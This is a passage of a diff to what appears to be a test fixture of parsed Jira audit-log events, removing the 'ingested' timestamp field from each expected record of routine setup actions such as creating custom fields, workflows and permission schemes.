access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3442,7 +3394,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924746741Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.166Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Assign Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3511,7 +3462,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924747709Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.165Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3580,7 +3530,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924750082Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.163Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3649,7 +3598,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924751025Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.151Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Projects\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3718,7 +3666,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.created", - "ingested": "2021-12-24T00:58:01.924751901Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.142Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.created\",\"action\":\"Permission scheme created\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Default scheme for Software projects.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Default software scheme\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3787,7 +3734,6 @@ }, "event": { "action": "Board created", - "ingested": "2021-12-24T00:58:01.924752758Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.072Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.boards\",\"category\":\"boards\",\"actionI18nKey\":\"Board created\",\"action\":\"Board created\"},\"affectedObjects\":[{\"name\":\"TEST board\",\"type\":\"BOARD\",\"uri\":\"http://jira.internal:8088/secure/RapidView.jspa?rapidView=1\",\"id\":\"1\"},{\"name\":\"TEST board\",\"type\":\"BOARD\",\"uri\":\"http://jira.internal:8088/secure/RapidView.jspa?rapidView=1\",\"id\":\"1\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3850,7 +3796,6 @@
 },
 "event": {
 "action": "jira.auditing.filter.created",
- "ingested": "2021-12-24T00:58:01.924753616Z",
 "original": "{\"timestamp\":\"2021-11-22T00:08:33.887Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.filters\",\"category\":\"filters\",\"actionI18nKey\":\"jira.auditing.filter.created\",\"action\":\"Filter created\"},\"affectedObjects\":[{\"name\":\"Filter for TEST board\",\"type\":\"FILTER\",\"uri\":\"http://jira.internal:8088/issues/?filter=10000\",\"id\":\"10000\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.concepts.description\",\"from\":\"\"},{\"key\":\"JQL Query\",\"i18nKey\":\"jira.jql.query\",\"from\":\"\",\"to\":\"{project = \\\"TEST\\\"} order by Rank ASC\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"from\":\"\",\"to\":\"Filter for TEST board\"},{\"key\":\"Owner\",\"i18nKey\":\"common.concepts.owner\",\"from\":\"\",\"to\":\"test.user\"},{\"key\":\"Shared with\",\"i18nKey\":\"common.concepts.shared.with\",\"from\":\"[]\",\"to\":\"[Project: test (VIEW)]\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -3946,7 +3891,6 @@
 },
 "event": {
 "action": "jira.auditing.workflow.scheme.added.to.project",
- "ingested": "2021-12-24T00:58:01.924754593Z",
 "original": "{\"timestamp\":\"2021-11-22T00:08:33.746Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.added.to.project\",\"action\":\"Workflow scheme added to project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10100\",\"id\":\"10100\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4009,7 +3953,6 @@
 },
 "event": {
 "action": "jira.auditing.workflow.scheme.created",
- "ingested": "2021-12-24T00:58:01.924755462Z",
 "original": "{\"timestamp\":\"2021-11-22T00:08:33.732Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.created\",\"action\":\"Workflow scheme created\"},\"affectedObjects\":[{\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10100\",\"id\":\"10100\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow scheme is managed internally by Jira Software. Do not manually modify this workflow scheme.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"TEST: Software Simplified Workflow Scheme\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4078,7 +4021,6 @@
 },
 "event": {
 "action": "jira.auditing.workflow.created",
- "ingested": "2021-12-24T00:58:01.924756341Z",
 "original": "{\"timestamp\":\"2021-11-22T00:08:33.710Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.created\",\"action\":\"Workflow created\"},\"affectedObjects\":[{\"name\":\"Software Simplified Workflow for Project TEST\",\"type\":\"WORKFLOW\",\"uri\":\"http://jira.internal:8088/secure/admin/workflows/ViewWorkflowSteps.jspa?workflowMode=live\u0026workflowName=Software Simplified Workflow for Project TEST\",\"id\":\"Software Simplified Workflow for Project TEST\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow is managed internally by Jira Software. Do not manually modify this workflow.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Software Simplified Workflow for Project TEST\"},{\"key\":\"Status\",\"i18nKey\":\"common.words.status\",\"to\":\"To Do, In Progress, Done\"},{\"key\":\"Transition\",\"i18nKey\":\"admin.workflowtransition.transition\",\"to\":\"Create (To Do), To Do (To Do), In Progress (In Progress), Done (Done)\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4157,7 +4099,6 @@
 },
 "event": {
 "action": "jira.auditing.resolutions.created",
- "ingested": "2021-12-24T00:58:01.924757221Z",
 "original": "{\"timestamp\":\"2021-11-22T00:08:33.537Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Cannot Reproduce\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10003\",\"id\":\"10003\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"All attempts at reproducing this issue failed, or not enough information was available to reproduce the issue. Reading the code produces no clues as to why this behavior would occur. If more information appears later, please reopen the issue.\"}]}",
 "type": "info",
 "kind": "event"
@@ -4221,7 +4162,6 @@
 },
 "event": {
 "action": "jira.auditing.resolutions.created",
- "ingested": "2021-12-24T00:58:01.924758086Z",
 "original": "{\"timestamp\":\"2021-11-22T00:08:33.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Duplicate\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10002\",\"id\":\"10002\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"The problem is a duplicate of an existing issue.\"}]}",
 "type": "info",
 "kind": "event"
@@ -4285,7 +4225,6 @@
 },
 "event": {
 "action": "jira.auditing.resolutions.created",
- "ingested": "2021-12-24T00:58:01.924759046Z",
 "original": "{\"timestamp\":\"2021-11-22T00:08:33.535Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Won't Do\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10001\",\"id\":\"10001\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"This issue won't be actioned.\"}]}",
 "type": "info",
 "kind": "event"
@@ -4349,7 +4288,6 @@
 },
 "event": {
 "action": "jira.auditing.resolutions.created",
- "ingested": "2021-12-24T00:58:01.924759950Z",
 "original": "{\"timestamp\":\"2021-11-22T00:08:33.534Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Done\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"Work has been completed on this issue.\"}]}",
 "type": "info",
 "kind": "event"
@@ -4413,7 +4351,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924760837Z",
 "original": "{\"timestamp\":\"2021-11-22T00:07:09.088Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Story Points\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10111\",\"id\":\"customfield_10111\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Measurement of complexity and/or size of a requirement.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Story Points\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Number Field\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4487,7 +4424,6 @@
 },
 "event": {
 "action": "jira.auditing.issue.type.created",
- "ingested": "2021-12-24T00:58:01.924761697Z",
 "original": "{\"timestamp\":\"2021-11-22T00:07:09.037Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"category\":\"issue types\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"action\":\"Issue type created\"},\"affectedObjects\":[{\"name\":\"Story\",\"type\":\"ISSUE_TYPE\",\"id\":\"10001\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "creation"
@@ -4548,7 +4484,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924762558Z",
 "original": "{\"timestamp\":\"2021-11-22T00:07:02.794Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Rank\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10110\",\"id\":\"customfield_10110\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Global rank field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Rank\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Global Rank\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4622,7 +4557,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924763493Z",
 "original": "{\"timestamp\":\"2021-11-22T00:07:02.725Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10109\",\"id\":\"customfield_10109\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Choose an epic to assign this issue to.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Link\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Epic Link Relationship\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4696,7 +4630,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924764352Z",
 "original": "{\"timestamp\":\"2021-11-22T00:07:02.694Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Sprint\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10108\",\"id\":\"customfield_10108\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Jira Software sprint field\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Sprint\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Jira Sprint Field\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4770,7 +4703,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924765219Z",
 "original": "{\"timestamp\":\"2021-11-22T00:07:01.669Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Colour\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10107\",\"id\":\"customfield_10107\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Epic Colour field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Colour\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Colour of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4844,7 +4776,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924766113Z",
 "original": "{\"timestamp\":\"2021-11-22T00:07:01.644Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Status\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10106\",\"id\":\"customfield_10106\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Epic Status field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Status\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Status of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4918,7 +4849,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924767044Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:59.522Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Name\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10105\",\"id\":\"customfield_10105\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Provide a short name to identify this epic.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Name\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Name of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -4992,7 +4922,6 @@
 },
 "event": {
 "action": "jira.auditing.issue.type.created",
- "ingested": "2021-12-24T00:58:01.924767911Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:59.485Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"category\":\"issue types\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"action\":\"Issue type created\"},\"affectedObjects\":[{\"name\":\"Epic\",\"type\":\"ISSUE_TYPE\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "creation"
@@ -5053,7 +4982,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.updated",
- "ingested": "2021-12-24T00:58:01.924768840Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:59.340Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10103\",\"id\":\"customfield_10103\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5110,7 +5038,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.updated",
- "ingested": "2021-12-24T00:58:01.924769711Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:59.332Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10102\",\"id\":\"customfield_10102\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5167,7 +5094,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924770565Z",
